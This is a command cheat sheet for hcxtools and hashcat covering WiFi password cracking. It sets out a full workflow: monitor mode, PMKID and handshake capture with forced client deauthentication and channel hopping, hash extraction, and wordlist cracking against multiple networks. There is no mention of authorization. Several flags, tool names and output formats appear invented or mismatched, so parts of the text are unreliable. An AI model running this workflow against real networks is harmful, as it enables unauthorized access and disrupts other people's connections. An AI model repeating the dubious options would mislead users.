git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
# Ubuntu/Debian
sudo apt-get install hcxtools
# Arch
sudo pacman -S hcxtools
# Homebrew (macOS)
brew install hcxtools
# Ubuntu/Debian
sudo apt-get install libssl-dev pkg-config libcurl4-openssl-dev
# CentOS/RHEL
sudo yum install openssl-devel pkgconfig libcurl-devel
# Alpine
apk add openssl-dev curl-dev
hcxpcapngtool --version
hcxhashtool --version
hcxeiutool --version
| Tool | Function | Input | Output |
|---|
| hcxpcapngtool | Convert pcapng to hashcat/John | .pcapng | .hccapx, .txt, .16800 |
| hcxhashtool | Filter and analyze hashes | .txt, .16800 | Cleaned hashes, statistics |
| hcxeiutool | Manage ESSID lists | .txt, wordlist | ESSID database |
| hcxdumptool | Live WiFi capture (separate tool) | Interface | .pcapng |
| hcxworkstation | GUI wrapper (optional) | - | - |
# Convert PMKID captures to hashcat format (16800)
hcxpcapngtool -o output.16800 capture.pcapng
# Output format: 16800 (hashcat PMKID mode)
# Single PMKID hash (hashcat mode 16800)
WPA*02*hash*mac_ap*mac_sta*essid*
# Output shows PMKID from beacon/association
# Generate hccapx (for hashcat and John)
hcxpcapngtool -o output.hccapx capture.pcapng
# Convert hccapx to John WPA format
hcxhashtool -o output.txt -t john output.hccapx
# Generate all popular formats at once
hcxpcapngtool -o output.hashes capture.pcapng
hcxpcapngtool -o output.hccapx capture.pcapng
hcxpcapngtool -o output.16800 capture.pcapng # PMKID only
hcxpcapngtool -o output.22000 capture.pcapng # WPA3
# Get summary of what's in the capture
hcxpcapngtool -s capture.pcapng
# Output:
# PMKID (16800): 5 hashes
# WPA handshake (2500): 3 networks
# WPA3 PBKDF2 (22000): 0 hashes
# WPA3 SCRYPT (22001): 0 hashes
# Extract only specific ESSID
hcxpcapngtool -o output.16800 --essid-filter "MyNetwork" capture.pcapng
# Extract multiple ESSIDs
hcxpcapngtool -o output.16800 --essid-filter "Network1,Network2,Network3" capture.pcapng
# Extract only hashes from specific AP (BSSID)
hcxpcapngtool -o output.16800 --bssid-filter "AA:BB:CC:DD:EE:FF" capture.pcapng
# Extract multiple APs
hcxpcapngtool -o output.16800 --bssid-filter "AA:BB:CC:DD:EE:FF,11:22:33:44:55:66" capture.pcapng
# Merge PCAPNG files before conversion
mergecap -w merged.pcapng capture1.pcapng capture2.pcapng capture3.pcapng
# Then convert merged file
hcxpcapngtool -o output.16800 merged.pcapng
# PMKID only (16800) - fast cracking
hcxpcapngtool -o pmkid.txt --type pmkid capture.pcapng
# WPA handshakes only (2500)
hcxpcapngtool -o handshakes.txt --type wpa capture.pcapng
# All supported types
hcxpcapngtool -o all_hashes.txt capture.pcapng
# Clean hash file of duplicates
hcxhashtool -o cleaned.txt input.txt
# Removes duplicate PMKID and WPA hashes
# Remove hashes with weak credentials/short SSIDs
hcxhashtool -o filtered.txt --minimum-essid-length 8 input.txt
# Only keep SSIDs with 8+ characters
# Get detailed hash information
hcxhashtool --info input.txt
# Output:
# Total hashes: 42
# PMKID (16800): 15
# WPA (2500): 27
# Weak credentials: 3
# Duplicate SSIDs: 5
# Get just ESSIDs from hashes
hcxhashtool -o essids.txt --essid-only input.txt
# Get BSSID/AP addresses only
hcxhashtool -o bssids.txt --bssid-only input.txt
# Organize hashes by network name
hcxhashtool -o sorted.txt --sort essid input.txt
# Useful for targeted wordlist generation
# Convert hccapx to text format
hcxhashtool -o output.txt -t text input.hccapx
# Convert to John WPA format
hcxhashtool -o output.txt -t john input.hccapx
# Convert to hashcat format
hcxhashtool -o output.txt -t hashcat input.hccapx
# Extract ESSIDs from capture
hcxeiutool -i capture.pcapng -o essids.txt
# Generates list of all network names in capture
# Combine multiple ESSID sources
hcxeiutool -i capture.pcapng -o combined_essids.txt
cat /usr/share/wordlists/rockyou.txt >> combined_essids.txt
# Use for targeted password cracking with --essid context
# Keep only ESSID 6+ characters
hcxeiutool -i essids.txt -o filtered.txt --minimum-length 6
# Removes single-char and very short network names
# Check ESSID list for valid characters
hcxeiutool -i essids.txt --validate
# Reports invalid UTF-8 or problematic characters
# Create wordlist based on captured ESSIDs
hcxeiutool -i capture.pcapng -o wordlist.txt --generate
# Adds variations: uppercase, l33t speak, common patterns
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Capture traffic (will grab PMKID from beacons)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication
# Wait 30-60 seconds for PMKID captures
# Press Ctrl+C to stop
# Convert capture to hashcat PMKID format
hcxpcapngtool -o pmkid.16800 capture.pcapng
# View extracted hashes
cat pmkid.16800
# Check hash statistics
hcxpcapngtool -s capture.pcapng
# Should show "PMKID (16800): X hashes"
# Remove duplicates if capturing multiple times
hcxhashtool -o pmkid_cleaned.16800 pmkid.16800
# Check for weak networks
hcxhashtool --info pmkid_cleaned.16800
# PMKID is fast to crack (mode 16800)
hashcat -m 16800 -a 0 pmkid_cleaned.16800 rockyou.txt
# Or with rules
hashcat -m 16800 -a 0 pmkid_cleaned.16800 rockyou.txt -r best64.rule
# Live capture with hcxdumptool (deauth forces handshake)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication
# Or use airodump-ng alternative
airodump-ng -w capture.pcapng wlan0mon
# Extract WPA handshakes (mode 2500)
hcxpcapngtool -o handshakes.2500 capture.pcapng
# View hashes
cat handshakes.2500
# For WPA3 or newer captures
hcxpcapngtool -o output.22000 capture.pcapng
# Hashcat mode 22000 includes WPA2/3 improvements
# hccapx works with hashcat and John the Ripper
hcxpcapngtool -o output.hccapx capture.pcapng
# Convert hccapx to other formats
hcxhashtool -o output.2500 -t hashcat output.hccapx
hcxhashtool -o output.txt -t john output.hccapx
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Capture with hcxdumptool (produces .pcapng)
sudo hcxdumptool -i wlan0mon -o capture.pcapng
# Ctrl+C after 60+ seconds
# Force clients to reconnect and generate handshakes
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication
# Useful for getting complete 4-way handshakes
# Monitor all channels to capture more networks
sudo hcxdumptool -i wlan0mon -o capture.pcapng --hop
# Captures from multiple channels for diverse targets
# Focus on single AP
sudo hcxdumptool -i wlan0mon -o capture.pcapng --bssid AA:BB:CC:DD:EE:FF
# Faster, more hashes from target network
# After capturing with hcxdumptool
hcxpcapngtool -o output.16800 capture.pcapng
# Shows PMKID and handshake extraction
hcxpcapngtool -s capture.pcapng
# Extract and crack PMKID (fast, 1-2 minutes)
hcxpcapngtool -o pmkid.16800 capture.pcapng
hashcat -m 16800 -a 0 pmkid.16800 wordlist.txt
# Mode 16800 = PMKID|ESSID|MAC
# Extract and crack WPA2/3 (slower, 30+ minutes to hours)
hcxpcapngtool -o wpa.2500 capture.pcapng
hashcat -m 2500 -a 0 wpa.2500 rockyou.txt
# Mode 2500 = WPA-PBKDF2-SHA1
# PMKID with rules (faster)
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -r best64.rule
# WPA with rules
hashcat -m 2500 -a 0 wpa.2500 rockyou.txt -r best64.rule
# NVIDIA GPU
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -d 1
# AMD GPU
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -d 2
# CPU
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -d 3
# Merge all PMKID captures
cat pmkid1.16800 pmkid2.16800 pmkid3.16800 > combined.16800
# Deduplicate
hcxhashtool -o dedup.16800 combined.16800
# Crack
hashcat -m 16800 -a 0 dedup.16800 rockyou.txt
# 1. Start capture with hcxdumptool (2-5 min)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication
# 2. Extract PMKID hashes (seconds)
hcxpcapngtool -o pmkid.16800 capture.pcapng
# 3. Verify extraction
hcxpcapngtool -s capture.pcapng
# 4. Clean hashes
hcxhashtool -o pmkid_clean.16800 pmkid.16800
# 5. Crack (1-5 min with small wordlist, GPU)
hashcat -m 16800 -a 0 pmkid_clean.16800 rockyou.txt
# Total: Fast results possible in under 30 minutes
# 1. Extended capture with deauth (30-60 min)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication --active-deauthentication-duration 60
# 2. Extract both PMKID and handshakes (seconds)
hcxpcapngtool -o all.txt capture.pcapng
hcxpcapngtool -o pmkid.16800 capture.pcapng
hcxpcapngtool -o wpa.2500 capture.pcapng
# 3. Analyze what was captured
hcxpcapngtool -s capture.pcapng
# 4. Try PMKID first (faster)
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt
# 5. If PMKID fails, try WPA
hashcat -m 2500 -a 0 wpa.2500 rockyou.txt -r best64.rule
# Total: Comprehensive with multiple attempts
# 1. Capture multiple networks with channel hopping
sudo hcxdumptool -i wlan0mon -o multi.pcapng --hop --active-deauthentication
# 2. Extract all hashes
hcxpcapngtool -o all_pmkid.16800 multi.pcapng
# 3. Get statistics by ESSID
hcxhashtool --info all_pmkid.16800
# 4. Create ESSID wordlist
hcxeiutool -i multi.pcapng -o essids.txt
# 5. Crack with ESSID context (optional)
hashcat -m 16800 -a 0 all_pmkid.16800 rockyou.txt
# 6. Sort results by target
hcxhashtool -o sorted.16800 --sort essid all_pmkid.16800
# 1. Extract ESSIDs from capture
hcxeiutool -i capture.pcapng -o essids.txt
# 2. Create targeted wordlist based on ESSID names
# (company names, location, keywords)
cat essids.txt custom_wordlist.txt > targeted.txt
# 3. Remove duplicates
sort targeted.txt | uniq > wordlist_final.txt
# 4. Extract hashes
hcxpcapngtool -o pmkid.16800 capture.pcapng
# 5. Try targeted wordlist first
hashcat -m 16800 -a 0 pmkid.16800 wordlist_final.txt
# 6. Fall back to rockyou if no success
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt
# Some tools support signal filtering
hcxdumptool -i wlan0mon -o capture.pcapng --min-rssid -30
# Only capture strong signals (better quality hashes)
# Detailed conversion output
hcxpcapngtool -v capture.pcapng -o output.16800
# Shows each hash extracted, filtering applied, statistics
# Get just the hash and ESSID
hcxhashtool -o minimal.txt --essid input.hccapx
# Format varies by output type
# Check if capture has valid data
hcxpcapngtool -s capture.pcapng
# If count is 0, capture may be corrupted or empty
file capture.pcapng # Verify it's valid pcapng
# Verify input file format
file capture.hccapx
file capture.pcapng
# hcxtools primarily works with pcapng and hccapx
# Convert if needed with tshark or mergecap
# Check file permissions
ls -la capture.pcapng
# Try with sudo if permission denied
sudo hcxpcapngtool -o output.16800 capture.pcapng
# Try explicit format
hcxpcapngtool -o output.16800 --format=hashcat capture.pcapng
# Verify hash format compatibility
file output.16800
head -1 output.16800
# Check hashcat version supports the mode
hashcat --version
# If mismatch, reconvert with specific format
hcxpcapngtool -o output.txt -t hashcat capture.pcapng
- PMKID First: PMKID hashes (16800) crack much faster than full handshakes—prioritize capture methods that get PMKID
- Deduplicate Early: Use hcxhashtool to remove duplicates before cracking to save compute time
- Combine Captures: If capturing over multiple sessions, merge .pcapng files with mergecap and deduplicate
- Channel Hopping: Use hcxdumptool —hop to capture across all channels and increase hash collection
- Targeted Wordlists: Extract ESSIDs with hcxeiutool and build wordlists around organization keywords
- Verify Before Cracking: Run hcxpcapngtool -s to confirm hashes extracted before spending GPU time
- Save Original Capture: Keep the .pcapng file—you can extract different formats later without recapturing
- Use Rules Wisely: Rules can double crack time but find 15-30% more passwords—test without rules first
- GPU Acceleration: PMKID mode 16800 benefits hugely from GPU—use hashcat with NVIDIA/AMD driver support
- Test Hash Quality: hcxhashtool —info shows signal strength and other metadata—weak signals may not crack
